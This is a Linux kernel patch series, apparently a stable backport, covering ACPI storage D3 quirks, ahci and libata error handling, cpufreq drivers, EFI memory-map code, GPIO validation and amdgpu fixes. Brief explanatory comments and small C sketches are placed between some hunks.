+  * is put into D3 over a Modern Standby / suspend-to-idle cycle.
+  *
+  * This is "typically" accomplished using the `StorageD3Enable`
+  * property in the _DSD that is checked via the `acpi_storage_d3` function
+- * but this property was introduced after many of these systems launched
+- * and most OEM systems don't have it in their BIOS.
++ * but some OEM systems still don't have it in their BIOS.
+  *
+  * The Microsoft documentation for StorageD3Enable mentioned that Windows has
+- * a hardcoded allowlist for D3 support, which was used for these platforms.
++ * a hardcoded allowlist for D3 support as well as a registry key to override
++ * the BIOS, which has been used for these cases.
+  *
+  * This allows quirking on Linux in a similar fashion.
+  *
+@@ -210,18 +210,15 @@ bool acpi_device_override_status(struct acpi_device *adev, unsigned long long *s
+  *    https://bugzilla.kernel.org/show_bug.cgi?id=216773
+  *    https://bugzilla.kernel.org/show_bug.cgi?id=217003
+  * 2) On at least one HP system StorageD3Enable is missing on the second NVME
+-      disk in the system.
++ *    disk in the system.
++ * 3) On at least one HP Rembrandt system StorageD3Enable is missing on the only
++ *    NVME device.
+  */
+-static const struct x86_cpu_id storage_d3_cpu_ids[] = {
+-	X86_MATCH_VENDOR_FAM_MODEL(AMD, 23, 96, NULL),	/* Renoir */
+-	X86_MATCH_VENDOR_FAM_MODEL(AMD, 23, 104, NULL),	/* Lucienne */
+-	X86_MATCH_VENDOR_FAM_MODEL(AMD, 25, 80, NULL),	/* Cezanne */
+-	{}
+-};
+-
+ bool force_storage_d3(void)
+ {
+-	return x86_match_cpu(storage_d3_cpu_ids);
++	if (!cpu_feature_enabled(X86_FEATURE_ZEN))
++		return false;
++	return acpi_gbl_FADT.flags & ACPI_FADT_LOW_POWER_S0;
+ }
+ 
+ /*
+diff --git a/drivers/ata/ahci.c b/drivers/ata/ahci.c
+index 17119e8dc8c30..20f53ae4d204e 100644
+--- a/drivers/ata/ahci.c
++++ b/drivers/ata/ahci.c
+@@ -1891,8 +1891,10 @@ static int ahci_init_one(struct pci_dev *pdev, const struct pci_device_id *ent)
+ 	n_ports = max(ahci_nr_ports(hpriv->cap), fls(hpriv->port_map));
+ 
+ 	host = ata_host_alloc_pinfo(&pdev->dev, ppi, n_ports);
+-	if (!host)
+-		return -ENOMEM;
++	if (!host) {
++		rc = -ENOMEM;
++		goto err_rm_sysfs_file;
++	}
+ 	host->private_data = hpriv;
+ 
+ 	if (ahci_init_msi(pdev, n_ports, hpriv) < 0) {
+@@ -1945,11 +1947,11 @@ static int ahci_init_one(struct pci_dev *pdev, const struct pci_device_id *ent)
+ 	/* initialize adapter */
+ 	rc = ahci_configure_dma_masks(pdev, hpriv);
+ 	if (rc)
+-		return rc;
++		goto err_rm_sysfs_file;
+ 
+ 	rc = ahci_pci_reset_controller(host);
+ 	if (rc)
+-		return rc;
++		goto err_rm_sysfs_file;
+ 
+ 	ahci_pci_init_controller(host);
+ 	ahci_pci_print_info(host);
+@@ -1958,10 +1960,15 @@ static int ahci_init_one(struct pci_dev *pdev, const struct pci_device_id *ent)
+ 
+ 	rc = ahci_host_activate(host, &ahci_sht);
+ 	if (rc)
+-		return rc;
++		goto err_rm_sysfs_file;
+ 
+ 	pm_runtime_put_noidle(&pdev->dev);
+ 	return 0;
++
++err_rm_sysfs_file:
++	sysfs_remove_file_from_group(&pdev->dev.kobj,
++				     &dev_attr_remapped_nvme.attr, NULL);
++	return rc;
+ }
+ 
+ static void ahci_shutdown_one(struct pci_dev *pdev)
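The ahci change converts early returns into a single unwind label so the sysfs
attribute created earlier in probe is removed on every failure path. The shape
of the pattern, reduced to a standalone sketch (the resource names are made
up):

	#include <stdio.h>

	static int acquire_a(void) { puts("A acquired"); return 0; }
	static int acquire_b(void) { puts("B failed");   return -1; }
	static void release_a(void) { puts("A released"); }

	static int probe(void)
	{
		int rc = acquire_a();	/* e.g. the remapped_nvme sysfs file */

		if (rc)
			return rc;

		rc = acquire_b();
		if (rc)
			goto err_release_a;	/* unwind only what we already own */
		return 0;

	err_release_a:
		release_a();
		return rc;
	}

	int main(void)
	{
		return probe() ? 1 : 0;
	}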
+diff --git a/drivers/ata/libata-core.c b/drivers/ata/libata-core.c
+index f14e56a5cff6b..5a13630034ef7 100644
+--- a/drivers/ata/libata-core.c
++++ b/drivers/ata/libata-core.c
+@@ -5523,8 +5523,10 @@ struct ata_host *ata_host_alloc(struct device *dev, int max_ports)
+ 	if (!host)
+ 		return NULL;
+ 
+-	if (!devres_open_group(dev, NULL, GFP_KERNEL))
+-		goto err_free;
++	if (!devres_open_group(dev, NULL, GFP_KERNEL)) {
++		kfree(host);
++		return NULL;
++	}
+ 
+ 	dr = devres_alloc(ata_devres_release, 0, GFP_KERNEL);
+ 	if (!dr)
+@@ -5556,8 +5558,6 @@ struct ata_host *ata_host_alloc(struct device *dev, int max_ports)
+ 
+  err_out:
+ 	devres_release_group(dev, NULL);
+- err_free:
+-	kfree(host);
+ 	return NULL;
+ }
+ EXPORT_SYMBOL_GPL(ata_host_alloc);
+diff --git a/drivers/counter/ti-eqep.c b/drivers/counter/ti-eqep.c
+index b0f24cf3e891d..4d3de4a35801f 100644
+--- a/drivers/counter/ti-eqep.c
++++ b/drivers/counter/ti-eqep.c
+@@ -6,6 +6,7 @@
+  */
+ 
+ #include <linux/bitops.h>
++#include <linux/clk.h>
+ #include <linux/counter.h>
+ #include <linux/kernel.h>
+ #include <linux/mod_devicetable.h>
+@@ -376,6 +377,7 @@ static int ti_eqep_probe(struct platform_device *pdev)
+ 	struct counter_device *counter;
+ 	struct ti_eqep_cnt *priv;
+ 	void __iomem *base;
++	struct clk *clk;
+ 	int err;
+ 
+ 	counter = devm_counter_alloc(dev, sizeof(*priv));
+@@ -415,6 +417,10 @@ static int ti_eqep_probe(struct platform_device *pdev)
+ 	pm_runtime_enable(dev);
+ 	pm_runtime_get_sync(dev);
+ 
++	clk = devm_clk_get_enabled(dev, NULL);
++	if (IS_ERR(clk))
++		return dev_err_probe(dev, PTR_ERR(clk), "failed to enable clock\n");
++
+ 	err = counter_add(counter);
+ 	if (err < 0) {
+ 		pm_runtime_put_sync(dev);
+diff --git a/drivers/cpufreq/amd-pstate.c b/drivers/cpufreq/amd-pstate.c
+index 9f147e9eafb63..90dcf26f09731 100644
+--- a/drivers/cpufreq/amd-pstate.c
++++ b/drivers/cpufreq/amd-pstate.c
+@@ -424,7 +424,7 @@ static int amd_pstate_set_boost(struct cpufreq_policy *policy, int state)
+ 	if (state)
+ 		policy->cpuinfo.max_freq = cpudata->max_freq;
+ 	else
+-		policy->cpuinfo.max_freq = cpudata->nominal_freq * 1000;
++		policy->cpuinfo.max_freq = cpudata->nominal_freq;
+ 
+ 	policy->max = policy->cpuinfo.max_freq;
+ 
+diff --git a/drivers/cpufreq/intel_pstate.c b/drivers/cpufreq/intel_pstate.c
+index 5771f3fc6115d..4abda800c632d 100644
+--- a/drivers/cpufreq/intel_pstate.c
++++ b/drivers/cpufreq/intel_pstate.c
+@@ -348,15 +348,14 @@ static void intel_pstate_set_itmt_prio(int cpu)
+ 	int ret;
+ 
+ 	ret = cppc_get_perf_caps(cpu, &cppc_perf);
+-	if (ret)
+-		return;
+-
+ 	/*
+-	 * On some systems with overclocking enabled, CPPC.highest_perf is hardcoded to 0xff.
+-	 * In this case we can't use CPPC.highest_perf to enable ITMT.
+-	 * In this case we can look at MSR_HWP_CAPABILITIES bits [8:0] to decide.
++	 * If CPPC is not available, fall back to MSR_HWP_CAPABILITIES bits [8:0].
++	 *
++	 * Also, on some systems with overclocking enabled, CPPC.highest_perf is
++	 * hardcoded to 0xff, so CPPC.highest_perf cannot be used to enable ITMT.
++	 * Fall back to MSR_HWP_CAPABILITIES then too.
+ 	 */
+-	if (cppc_perf.highest_perf == CPPC_MAX_PERF)
++	if (ret || cppc_perf.highest_perf == CPPC_MAX_PERF)
+ 		cppc_perf.highest_perf = HWP_HIGHEST_PERF(READ_ONCE(all_cpu_data[cpu]->hwp_cap_cached));
+ 
+ 	/*
+diff --git a/drivers/firmware/efi/fdtparams.c b/drivers/firmware/efi/fdtparams.c
+index e901f8564ca0c..0ec83ba580972 100644
+--- a/drivers/firmware/efi/fdtparams.c
++++ b/drivers/firmware/efi/fdtparams.c
+@@ -30,11 +30,13 @@ static __initconst const char name[][22] = {
+ 
+ static __initconst const struct {
+ 	const char	path[17];
++	u8		paravirt;
+ 	const char	params[PARAMCOUNT][26];
+ } dt_params[] = {
+ 	{
+ #ifdef CONFIG_XEN    //  <-------17------>
+ 		.path = "/hypervisor/uefi",
++		.paravirt = 1,
+ 		.params = {
+ 			[SYSTAB] = "xen,uefi-system-table",
+ 			[MMBASE] = "xen,uefi-mmap-start",
+@@ -121,6 +123,8 @@ u64 __init efi_get_fdt_params(struct efi_memory_map_data *mm)
+ 			pr_err("Can't find property '%s' in DT!\n", pname);
+ 			return 0;
+ 		}
++		if (dt_params[i].paravirt)
++			set_bit(EFI_PARAVIRT, &efi.flags);
+ 		return systab;
+ 	}
+ notfound:
+diff --git a/drivers/firmware/efi/memmap.c b/drivers/firmware/efi/memmap.c
+index 6ec7970dbd40a..77dd20f9df312 100644
+--- a/drivers/firmware/efi/memmap.c
++++ b/drivers/firmware/efi/memmap.c
+@@ -9,82 +9,11 @@
+ #include <linux/kernel.h>
+ #include <linux/efi.h>
+ #include <linux/io.h>
+-#include <asm/early_ioremap.h>
+ #include <linux/memblock.h>
+ #include <linux/slab.h>
+ 
+-static phys_addr_t __init __efi_memmap_alloc_early(unsigned long size)
+-{
+-	return memblock_phys_alloc(size, SMP_CACHE_BYTES);
+-}
+-
+-static phys_addr_t __init __efi_memmap_alloc_late(unsigned long size)
+-{
+-	unsigned int order = get_order(size);
+-	struct page *p = alloc_pages(GFP_KERNEL, order);
+-
+-	if (!p)
+-		return 0;
+-
+-	return PFN_PHYS(page_to_pfn(p));
+-}
+-
+-void __init __efi_memmap_free(u64 phys, unsigned long size, unsigned long flags)
+-{
+-	if (flags & EFI_MEMMAP_MEMBLOCK) {
+-		if (slab_is_available())
+-			memblock_free_late(phys, size);
+-		else
+-			memblock_phys_free(phys, size);
+-	} else if (flags & EFI_MEMMAP_SLAB) {
+-		struct page *p = pfn_to_page(PHYS_PFN(phys));
+-		unsigned int order = get_order(size);
+-
+-		free_pages((unsigned long) page_address(p), order);
+-	}
+-}
+-
+-static void __init efi_memmap_free(void)
+-{
+-	__efi_memmap_free(efi.memmap.phys_map,
+-			efi.memmap.desc_size * efi.memmap.nr_map,
+-			efi.memmap.flags);
+-}
+-
+-/**
+- * efi_memmap_alloc - Allocate memory for the EFI memory map
+- * @num_entries: Number of entries in the allocated map.
+- * @data: efi memmap installation parameters
+- *
+- * Depending on whether mm_init() has already been invoked or not,
+- * either memblock or "normal" page allocation is used.
+- *
+- * Returns zero on success, a negative error code on failure.
+- */
+-int __init efi_memmap_alloc(unsigned int num_entries,
+-		struct efi_memory_map_data *data)
+-{
+-	/* Expect allocation parameters are zero initialized */
+-	WARN_ON(data->phys_map || data->size);
+-
+-	data->size = num_entries * efi.memmap.desc_size;
+-	data->desc_version = efi.memmap.desc_version;
+-	data->desc_size = efi.memmap.desc_size;
+-	data->flags &= ~(EFI_MEMMAP_SLAB | EFI_MEMMAP_MEMBLOCK);
+-	data->flags |= efi.memmap.flags & EFI_MEMMAP_LATE;
+-
+-	if (slab_is_available()) {
+-		data->flags |= EFI_MEMMAP_SLAB;
+-		data->phys_map = __efi_memmap_alloc_late(data->size);
+-	} else {
+-		data->flags |= EFI_MEMMAP_MEMBLOCK;
+-		data->phys_map = __efi_memmap_alloc_early(data->size);
+-	}
+-
+-	if (!data->phys_map)
+-		return -ENOMEM;
+-	return 0;
+-}
++#include <asm/early_ioremap.h>
++#include <asm/efi.h>
+ 
+ /**
+  * __efi_memmap_init - Common code for mapping the EFI memory map
+@@ -101,14 +30,11 @@ int __init efi_memmap_alloc(unsigned int num_entries,
+  *
+  * Returns zero on success, a negative error code on failure.
+  */
+-static int __init __efi_memmap_init(struct efi_memory_map_data *data)
++int __init __efi_memmap_init(struct efi_memory_map_data *data)
+ {
+ 	struct efi_memory_map map;
+ 	phys_addr_t phys_map;
+ 
+-	if (efi_enabled(EFI_PARAVIRT))
+-		return 0;
+-
+ 	phys_map = data->phys_map;
+ 
+ 	if (data->flags & EFI_MEMMAP_LATE)
+@@ -121,9 +47,6 @@ static int __init __efi_memmap_init(struct efi_memory_map_data *data)
+ 		return -ENOMEM;
+ 	}
+ 
+-	/* NOP if data->flags & (EFI_MEMMAP_MEMBLOCK | EFI_MEMMAP_SLAB) == 0 */
+-	efi_memmap_free();
+-
+ 	map.phys_map = data->phys_map;
+ 	map.nr_map = data->size / data->desc_size;
+ 	map.map_end = map.map + data->size;
+@@ -220,158 +143,3 @@ int __init efi_memmap_init_late(phys_addr_t addr, unsigned long size)
+ 
+ 	return __efi_memmap_init(&data);
+ }
+-
+-/**
+- * efi_memmap_install - Install a new EFI memory map in efi.memmap
+- * @ctx: map allocation parameters (address, size, flags)
+- *
+- * Unlike efi_memmap_init_*(), this function does not allow the caller
+- * to switch from early to late mappings. It simply uses the existing
+- * mapping function and installs the new memmap.
+- *
+- * Returns zero on success, a negative error code on failure.
+- */
+-int __init efi_memmap_install(struct efi_memory_map_data *data)
+-{
+-	efi_memmap_unmap();
+-
+-	return __efi_memmap_init(data);
+-}
+-
+-/**
+- * efi_memmap_split_count - Count number of additional EFI memmap entries
+- * @md: EFI memory descriptor to split
+- * @range: Address range (start, end) to split around
+- *
+- * Returns the number of additional EFI memmap entries required to
+- * accommodate @range.
+- */
+-int __init efi_memmap_split_count(efi_memory_desc_t *md, struct range *range)
+-{
+-	u64 m_start, m_end;
+-	u64 start, end;
+-	int count = 0;
+-
+-	start = md->phys_addr;
+-	end = start + (md->num_pages << EFI_PAGE_SHIFT) - 1;
+-
+-	/* modifying range */
+-	m_start = range->start;
+-	m_end = range->end;
+-
+-	if (m_start <= start) {
+-		/* split into 2 parts */
+-		if (start < m_end && m_end < end)
+-			count++;
+-	}
+-
+-	if (start < m_start && m_start < end) {
+-		/* split into 3 parts */
+-		if (m_end < end)
+-			count += 2;
+-		/* split into 2 parts */
+-		if (end <= m_end)
+-			count++;
+-	}
+-
+-	return count;
+-}
+-
+-/**
+- * efi_memmap_insert - Insert a memory region in an EFI memmap
+- * @old_memmap: The existing EFI memory map structure
+- * @buf: Address of buffer to store new map
+- * @mem: Memory map entry to insert
+- *
+- * It is suggested that you call efi_memmap_split_count() first
+- * to see how large @buf needs to be.
+- */
+-void __init efi_memmap_insert(struct efi_memory_map *old_memmap, void *buf,
+-			      struct efi_mem_range *mem)
+-{
+-	u64 m_start, m_end, m_attr;
+-	efi_memory_desc_t *md;
+-	u64 start, end;
+-	void *old, *new;
+-
+-	/* modifying range */
+-	m_start = mem->range.start;
+-	m_end = mem->range.end;
+-	m_attr = mem->attribute;
+-
+-	/*
+-	 * The EFI memory map deals with regions in EFI_PAGE_SIZE
+-	 * units. Ensure that the region described by 'mem' is aligned
+-	 * correctly.
+-	 */
+-	if (!IS_ALIGNED(m_start, EFI_PAGE_SIZE) ||
+-	    !IS_ALIGNED(m_end + 1, EFI_PAGE_SIZE)) {
+-		WARN_ON(1);
+-		return;
+-	}
+-
+-	for (old = old_memmap->map, new = buf;
+-	     old < old_memmap->map_end;
+-	     old += old_memmap->desc_size, new += old_memmap->desc_size) {
+-
+-		/* copy original EFI memory descriptor */
+-		memcpy(new, old, old_memmap->desc_size);
+-		md = new;
+-		start = md->phys_addr;
+-		end = md->phys_addr + (md->num_pages << EFI_PAGE_SHIFT) - 1;
+-
+-		if (m_start <= start && end <= m_end)
+-			md->attribute |= m_attr;
+-
+-		if (m_start <= start &&
+-		    (start < m_end && m_end < end)) {
+-			/* first part */
+-			md->attribute |= m_attr;
+-			md->num_pages = (m_end - md->phys_addr + 1) >>
+-				EFI_PAGE_SHIFT;
+-			/* latter part */
+-			new += old_memmap->desc_size;
+-			memcpy(new, old, old_memmap->desc_size);
+-			md = new;
+-			md->phys_addr = m_end + 1;
+-			md->num_pages = (end - md->phys_addr + 1) >>
+-				EFI_PAGE_SHIFT;
+-		}
+-
+-		if ((start < m_start && m_start < end) && m_end < end) {
+-			/* first part */
+-			md->num_pages = (m_start - md->phys_addr) >>
+-				EFI_PAGE_SHIFT;
+-			/* middle part */
+-			new += old_memmap->desc_size;
+-			memcpy(new, old, old_memmap->desc_size);
+-			md = new;
+-			md->attribute |= m_attr;
+-			md->phys_addr = m_start;
+-			md->num_pages = (m_end - m_start + 1) >>
+-				EFI_PAGE_SHIFT;
+-			/* last part */
+-			new += old_memmap->desc_size;
+-			memcpy(new, old, old_memmap->desc_size);
+-			md = new;
+-			md->phys_addr = m_end + 1;
+-			md->num_pages = (end - m_end) >>
+-				EFI_PAGE_SHIFT;
+-		}
+-
+-		if ((start < m_start && m_start < end) &&
+-		    (end <= m_end)) {
+-			/* first part */
+-			md->num_pages = (m_start - md->phys_addr) >>
+-				EFI_PAGE_SHIFT;
+-			/* latter part */
+-			new += old_memmap->desc_size;
+-			memcpy(new, old, old_memmap->desc_size);
+-			md = new;
+-			md->phys_addr = m_start;
+-			md->num_pages = (end - md->phys_addr + 1) >>
+-				EFI_PAGE_SHIFT;
+-			md->attribute |= m_attr;
+-		}
+-	}
+-}
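
The two helpers removed above are pure interval arithmetic: a descriptor [start, end] overlapped by a modifying range [m_start, m_end] either stays whole, splits in two, or splits in three, and efi_memmap_split_count() only counts the extra entries. A minimal standalone sketch of that counting rule, keeping the inclusive-end convention of the code above (the harness and test values are illustrative, not from the patch):

#include <stdint.h>
#include <stdio.h>

/*
 * How many extra map entries are needed to split [start, end]
 * (inclusive) around [m_start, m_end]?  Mirrors the logic of the
 * removed efi_memmap_split_count(): 0 = untouched or fully covered,
 * 1 = two pieces, 2 = three pieces.
 */
static int split_count(uint64_t start, uint64_t end,
		       uint64_t m_start, uint64_t m_end)
{
	int count = 0;

	if (m_start <= start) {
		/* range starts at or before the region: at most two parts */
		if (start < m_end && m_end < end)
			count++;
	}

	if (start < m_start && m_start < end) {
		if (m_end < end)
			count += 2;	/* range strictly inside: three parts */
		if (end <= m_end)
			count++;	/* range covers the tail: two parts */
	}

	return count;
}

int main(void)
{
	/* range strictly inside the region: two extra entries */
	printf("%d\n", split_count(0x1000, 0x8fff, 0x2000, 0x2fff));
	/* range covering the tail: one extra entry */
	printf("%d\n", split_count(0x1000, 0x8fff, 0x4000, 0x8fff));
	return 0;
}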
+diff --git a/drivers/gpio/gpio-davinci.c b/drivers/gpio/gpio-davinci.c
+index 69f3d864f69d3..206829165fc58 100644
+--- a/drivers/gpio/gpio-davinci.c
++++ b/drivers/gpio/gpio-davinci.c
+@@ -230,6 +230,11 @@ static int davinci_gpio_probe(struct platform_device *pdev)
+ 	else
+ 		nirq = DIV_ROUND_UP(ngpio, 16);
+ 
++	if (nirq > MAX_INT_PER_BANK) {
++		dev_err(dev, "Too many IRQs!\n");
++		return -EINVAL;
++	}
++
+ 	chips = devm_kzalloc(dev, sizeof(*chips), GFP_KERNEL);
+ 	if (!chips)
+ 		return -ENOMEM;
+diff --git a/drivers/gpio/gpiolib-cdev.c b/drivers/gpio/gpiolib-cdev.c
+index 97e8335716b01..be51bd00d2fd2 100644
+--- a/drivers/gpio/gpiolib-cdev.c
++++ b/drivers/gpio/gpiolib-cdev.c
+@@ -132,6 +132,10 @@ struct linehandle_state {
+ 	GPIOHANDLE_REQUEST_OPEN_DRAIN | \
+ 	GPIOHANDLE_REQUEST_OPEN_SOURCE)
+ 
++#define GPIOHANDLE_REQUEST_DIRECTION_FLAGS \
++	(GPIOHANDLE_REQUEST_INPUT | \
++	 GPIOHANDLE_REQUEST_OUTPUT)
++
+ static int linehandle_validate_flags(u32 flags)
+ {
+ 	/* Return an error if an unknown flag is set */
+@@ -212,21 +216,21 @@ static long linehandle_set_config(struct linehandle_state *lh,
+ 	if (ret)
+ 		return ret;
+ 
++	/* Lines must be reconfigured explicitly as input or output. */
++	if (!(lflags & GPIOHANDLE_REQUEST_DIRECTION_FLAGS))
++		return -EINVAL;
++
+ 	for (i = 0; i < lh->num_descs; i++) {
+ 		desc = lh->descs[i];
+-		linehandle_flags_to_desc_flags(gcnf.flags, &desc->flags);
++		linehandle_flags_to_desc_flags(lflags, &desc->flags);
+ 
+-		/*
+-		 * Lines have to be requested explicitly for input
+-		 * or output, else the line will be treated "as is".
+-		 */
+ 		if (lflags & GPIOHANDLE_REQUEST_OUTPUT) {
+ 			int val = !!gcnf.default_values[i];
+ 
+ 			ret = gpiod_direction_output(desc, val);
+ 			if (ret)
+ 				return ret;
+-		} else if (lflags & GPIOHANDLE_REQUEST_INPUT) {
++		} else {
+ 			ret = gpiod_direction_input(desc);
+ 			if (ret)
+ 				return ret;
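
The gpiolib-cdev change above makes linehandle_set_config() reject a reconfiguration that names neither direction, instead of silently leaving lines "as is". The check itself is a single mask test; a standalone sketch of the same pattern (the flag values match the GPIO character-device UAPI; validate_config_flags() is an invented harness):

#include <errno.h>
#include <stdint.h>
#include <stdio.h>

#define GPIOHANDLE_REQUEST_INPUT	(1UL << 0)
#define GPIOHANDLE_REQUEST_OUTPUT	(1UL << 1)

#define GPIOHANDLE_REQUEST_DIRECTION_FLAGS \
	(GPIOHANDLE_REQUEST_INPUT | GPIOHANDLE_REQUEST_OUTPUT)

/* A reconfiguration must ask for input or output explicitly. */
static int validate_config_flags(uint32_t flags)
{
	if (!(flags & GPIOHANDLE_REQUEST_DIRECTION_FLAGS))
		return -EINVAL;
	return 0;
}

int main(void)
{
	printf("%d\n", validate_config_flags(0));			  /* -EINVAL */
	printf("%d\n", validate_config_flags(GPIOHANDLE_REQUEST_INPUT)); /* 0 */
	return 0;
}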
+diff --git a/drivers/gpu/drm/amd/amdgpu/amdgpu_atomfirmware.c b/drivers/gpu/drm/amd/amdgpu/amdgpu_atomfirmware.c
+index 0d017dc94f013..1e64720a70a2b 100644
+--- a/drivers/gpu/drm/amd/amdgpu/amdgpu_atomfirmware.c
++++ b/drivers/gpu/drm/amd/amdgpu/amdgpu_atomfirmware.c
+@@ -387,7 +387,7 @@ amdgpu_atomfirmware_get_vram_info(struct amdgpu_device *adev,
+ 					mem_channel_number = vram_info->v30.channel_num;
+ 					mem_channel_width = vram_info->v30.channel_width;
+ 					if (vram_width)
+-						*vram_width = mem_channel_number * (1 << mem_channel_width);
++						*vram_width = mem_channel_number * 16;
+ 					break;
+ 				default:
+ 					return -EINVAL;
+diff --git a/drivers/gpu/drm/amd/amdgpu/amdgpu_device.c b/drivers/gpu/drm/amd/amdgpu/amdgpu_device.c
+index b11690a816e73..157441dd07041 100644
+--- a/drivers/gpu/drm/amd/amdgpu/amdgpu_device.c
++++ b/drivers/gpu/drm/amd/amdgpu/amdgpu_device.c
+@@ -980,7 +980,7 @@ void amdgpu_device_program_register_sequence(struct amdgpu_device *adev,
+ 	if (array_size % 3)
+ 		return;
+ 
+-	for (i = 0; i < array_size; i +=3) {
++	for (i = 0; i < array_size; i += 3) {
+ 		reg = registers[i + 0];
+ 		and_mask = registers[i + 1];
+ 		or_mask = registers[i + 2];
+@@ -1552,7 +1552,7 @@ static int amdgpu_device_check_arguments(struct amdgpu_device *adev)
+ 		dev_warn(adev->dev, "sched jobs (%d) must be at least 4\n",
+ 			 amdgpu_sched_jobs);
+ 		amdgpu_sched_jobs = 4;
+-	} else if (!is_power_of_2(amdgpu_sched_jobs)){
++	} else if (!is_power_of_2(amdgpu_sched_jobs)) {
+ 		dev_warn(adev->dev, "sched jobs (%d) must be a power of 2\n",
+ 			 amdgpu_sched_jobs);
+ 		amdgpu_sched_jobs = roundup_pow_of_two(amdgpu_sched_jobs);
+@@ -2747,8 +2747,9 @@ static int amdgpu_device_ip_late_init(struct amdgpu_device *adev)
+ 		DRM_ERROR("enable mgpu fan boost failed (%d).\n", r);
+ 
+ 	/* For passthrough configuration on arcturus and aldebaran, enable special handling SBR */
+-	if (amdgpu_passthrough(adev) && ((adev->asic_type == CHIP_ARCTURUS && adev->gmc.xgmi.num_physical_nodes > 1)||
+-			       adev->asic_type == CHIP_ALDEBARAN ))
++	if (amdgpu_passthrough(adev) &&
++	    ((adev->asic_type == CHIP_ARCTURUS && adev->gmc.xgmi.num_physical_nodes > 1) ||
++	     adev->asic_type == CHIP_ALDEBARAN))
+ 		amdgpu_dpm_handle_passthrough_sbr(adev, true);
+ 
+ 	if (adev->gmc.xgmi.num_physical_nodes > 1) {
+@@ -3077,7 +3078,7 @@ static int amdgpu_device_ip_suspend_phase2(struct amdgpu_device *adev)
+ 		}
+ 		adev->ip_blocks[i].status.hw = false;
+ 		/* handle putting the SMC in the appropriate state */
+-		if(!amdgpu_sriov_vf(adev)){
++		if (!amdgpu_sriov_vf(adev)) {
+ 			if (adev->ip_blocks[i].version->type == AMD_IP_BLOCK_TYPE_SMC) {
+ 				r = amdgpu_dpm_set_mp1_state(adev, adev->mp1_state);
+ 				if (r) {
+@@ -4048,7 +4049,7 @@ void amdgpu_device_fini_hw(struct amdgpu_device *adev)
+ 
+ 	/* disable all interrupts */
+ 	amdgpu_irq_disable_all(adev);
+-	if (adev->mode_info.mode_config_initialized){
++	if (adev->mode_info.mode_config_initialized) {
+ 		if (!drm_drv_uses_atomic_modeset(adev_to_drm(adev)))
+ 			drm_helper_force_disable_all(adev_to_drm(adev));
+ 		else
+@@ -4755,42 +4756,45 @@ bool amdgpu_device_should_recover_gpu(struct amdgpu_device *adev)
+ 
+ int amdgpu_device_mode1_reset(struct amdgpu_device *adev)
+ {
+-        u32 i;
+-        int ret = 0;
++	u32 i;
++	int ret = 0;
+ 
+-        amdgpu_atombios_scratch_regs_engine_hung(adev, true);
++	amdgpu_atombios_scratch_regs_engine_hung(adev, true);
+ 
+-        dev_info(adev->dev, "GPU mode1 reset\n");
++	dev_info(adev->dev, "GPU mode1 reset\n");
+ 
+-        /* disable BM */
+-        pci_clear_master(adev->pdev);
++	/* Cache the state before bus master disable. The saved config space
++	 * values are used in other cases like restore after mode-2 reset.
++	 */
++	amdgpu_device_cache_pci_state(adev->pdev);
+ 
+-        amdgpu_device_cache_pci_state(adev->pdev);
++	/* disable BM */
++	pci_clear_master(adev->pdev);
+ 
+-        if (amdgpu_dpm_is_mode1_reset_supported(adev)) {
+-                dev_info(adev->dev, "GPU smu mode1 reset\n");
+-                ret = amdgpu_dpm_mode1_reset(adev);
+-        } else {
+-                dev_info(adev->dev, "GPU psp mode1 reset\n");
+-                ret = psp_gpu_reset(adev);
+-        }
++	if (amdgpu_dpm_is_mode1_reset_supported(adev)) {
++		dev_info(adev->dev, "GPU smu mode1 reset\n");
++		ret = amdgpu_dpm_mode1_reset(adev);
++	} else {
++		dev_info(adev->dev, "GPU psp mode1 reset\n");
++		ret = psp_gpu_reset(adev);
++	}
+ 
+-        if (ret)
+-                dev_err(adev->dev, "GPU mode1 reset failed\n");
++	if (ret)
++		dev_err(adev->dev, "GPU mode1 reset failed\n");
+ 
+-        amdgpu_device_load_pci_state(adev->pdev);
++	amdgpu_device_load_pci_state(adev->pdev);
+ 
+-        /* wait for asic to come out of reset */
+-        for (i = 0; i < adev->usec_timeout; i++) {
+-                u32 memsize = adev->nbio.funcs->get_memsize(adev);
++	/* wait for asic to come out of reset */
++	for (i = 0; i < adev->usec_timeout; i++) {
++		u32 memsize = adev->nbio.funcs->get_memsize(adev);
+ 
+-                if (memsize != 0xffffffff)
+-                        break;
+-                udelay(1);
+-        }
++		if (memsize != 0xffffffff)
++			break;
++		udelay(1);
++	}
+ 
+-        amdgpu_atombios_scratch_regs_engine_hung(adev, false);
+-        return ret;
++	amdgpu_atombios_scratch_regs_engine_hung(adev, false);
++	return ret;
+ }
+ 
+ int amdgpu_device_pre_asic_reset(struct amdgpu_device *adev,
+diff --git a/drivers/gpu/drm/amd/amdgpu/amdgpu_drv.c b/drivers/gpu/drm/amd/amdgpu/amdgpu_drv.c
+index 9a5416331f02e..238c15c0c7e1e 100644
+--- a/drivers/gpu/drm/amd/amdgpu/amdgpu_drv.c
++++ b/drivers/gpu/drm/amd/amdgpu/amdgpu_drv.c
+@@ -1662,7 +1662,7 @@ static const u16 amdgpu_unsupported_pciidlist[] = {
+ };
+ 
+ static const struct pci_device_id pciidlist[] = {
+-#ifdef  CONFIG_DRM_AMDGPU_SI
++#ifdef CONFIG_DRM_AMDGPU_SI
+ 	{0x1002, 0x6780, PCI_ANY_ID, PCI_ANY_ID, 0, 0, CHIP_TAHITI},
+ 	{0x1002, 0x6784, PCI_ANY_ID, PCI_ANY_ID, 0, 0, CHIP_TAHITI},
+ 	{0x1002, 0x6788, PCI_ANY_ID, PCI_ANY_ID, 0, 0, CHIP_TAHITI},
+diff --git a/drivers/gpu/drm/amd/amdgpu/amdgpu_vkms.c b/drivers/gpu/drm/amd/amdgpu/amdgpu_vkms.c
+index 06980b8527ff8..76f23652cc14d 100644
+--- a/drivers/gpu/drm/amd/amdgpu/amdgpu_vkms.c
++++ b/drivers/gpu/drm/amd/amdgpu/amdgpu_vkms.c
+@@ -2,6 +2,7 @@
+ 
+ #include <drm/drm_atomic_helper.h>
+ #include <drm/drm_simple_kms_helper.h>
++#include <drm/drm_gem_framebuffer_helper.h>
+ #include <drm/drm_vblank.h>
+ 
+ #include "amdgpu.h"
+@@ -313,7 +314,13 @@ static int amdgpu_vkms_prepare_fb(struct drm_plane *plane,
+ 		return 0;
+ 	}
+ 	afb = to_amdgpu_framebuffer(new_state->fb);
+-	obj = new_state->fb->obj[0];
++
++	obj = drm_gem_fb_get_obj(new_state->fb, 0);
++	if (!obj) {
++		DRM_ERROR("Failed to get obj from framebuffer\n");
++		return -EINVAL;
++	}
++
+ 	rbo = gem_to_amdgpu_bo(obj);
+ 	adev = amdgpu_ttm_adev(rbo->tbo.bdev);
+ 
